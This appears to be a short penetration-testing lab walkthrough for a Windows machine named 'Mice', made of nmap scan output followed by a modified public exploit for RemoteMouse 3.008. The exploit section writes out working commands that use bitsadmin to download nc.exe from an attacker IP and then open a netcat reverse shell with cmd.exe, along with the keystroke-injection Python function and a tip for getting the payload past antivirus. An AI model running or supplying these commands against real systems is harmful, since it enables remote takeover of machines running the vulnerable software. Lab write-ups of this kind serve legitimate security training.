Mice (Windows)

1978/tcp open  unisql?
| fingerprint-strings: 
|   DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, ms-sql-s: 
|_    SIN 15win nop nop 300
1979/tcp open  unisql-java?
1980/tcp open  pearldoc-xact?
3389/tcp open  ms-wbt-server  Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: REMOTE-PC
|   NetBIOS_Domain_Name: REMOTE-PC
|   NetBIOS_Computer_Name: REMOTE-PC
|   DNS_Domain_Name: Remote-PC
|   DNS_Computer_Name: Remote-PC
|   Product_Version: 10.0.19041
|_  System_Time: 2022-05-18T16:19:09+00:00
|_ssl-date: 2022-05-18T16:19:37+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Remote-PC
| Not valid before: 2022-05-17T00:09:34
|_Not valid after:  2022-11-16T00:09:34
7680/tcp open  pando-pub?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1978-TCP:V=7.92%I=7%D=5/18%Time=62851BDD%P=x86_64-pc-linux-gnu%r(NU
SF:LL,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(GenericLines,15,"SIN\x2015
SF:win\x20nop\x20nop\x20300")%r(GetRequest,15,"SIN\x2015win\x20nop\x20nop\
SF:x20300")%r(HTTPOptions,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(RTSPRe
SF:quest,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(DNSVersionBindReqTCP,15
SF:,"SIN\x2015win\x20nop\x20nop\x20300")%r(Help,15,"SIN\x2015win\x20nop\x2
SF:0nop\x20300")%r(SSLSessionReq,15,"SIN\x2015win\x20nop\x20nop\x20300")%r
SF:(TLSSessionReq,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(FourOhFourRequ
SF:est,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(LPDString,15,"SIN\x2015wi
SF:n\x20nop\x20nop\x20300")%r(LDAPSearchReq,15,"SIN\x2015win\x20nop\x20nop
SF:\x20300")%r(LDAPBindReq,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(SIPOp
SF:tions,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(LANDesk-RC,15,"SIN\x201
SF:5win\x20nop\x20nop\x20300")%r(JavaRMI,15,"SIN\x2015win\x20nop\x20nop\x2
SF:0300")%r(ms-sql-s,15,"SIN\x2015win\x20nop\x20nop\x20300");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
​
​
1978 has an exploit 
RemoteMouse 3.008 - Arbitrary Remote Command Execution
Exploit Database
Modify the script 
cmd1='mkdir c:\\pwn'
cmd2='bitsadmin /transfer job /download /priority high http://192.168.49.183/nc.exe c:\\pwn\\nc.exe'
cmd3='c:\\pwn\\nc.exe -e cmd.exe 192.168.49.183 443'
​
def PopCalc(ip):
    MoveMouse(-5000,3000,ip)
    MousePress(mouse.leftClick,ip)
    sleep(1)
    SendString("cmd.exe",ip)
    sleep(1)
    SendString("\n",ip)
    sleep(1)
    SendString(cmd1,ip)
    sleep(1)
    SendString("\n",ip)
    sleep(1)
    SendString(cmd2,ip)
    sleep(1)
    SendString("\n",ip)
    sleep(25)
    SendString(cmd3,ip)
    sleep(1)
    SendString("\n",ip)
    print("SUCCESS!",ip)
Now because of the antivirus setting, you need to host the file on an actual web server (apache) instead of the python web server or it won't work. 
 
​
​
SunsetNoontide
internal
Last modified 10mo ago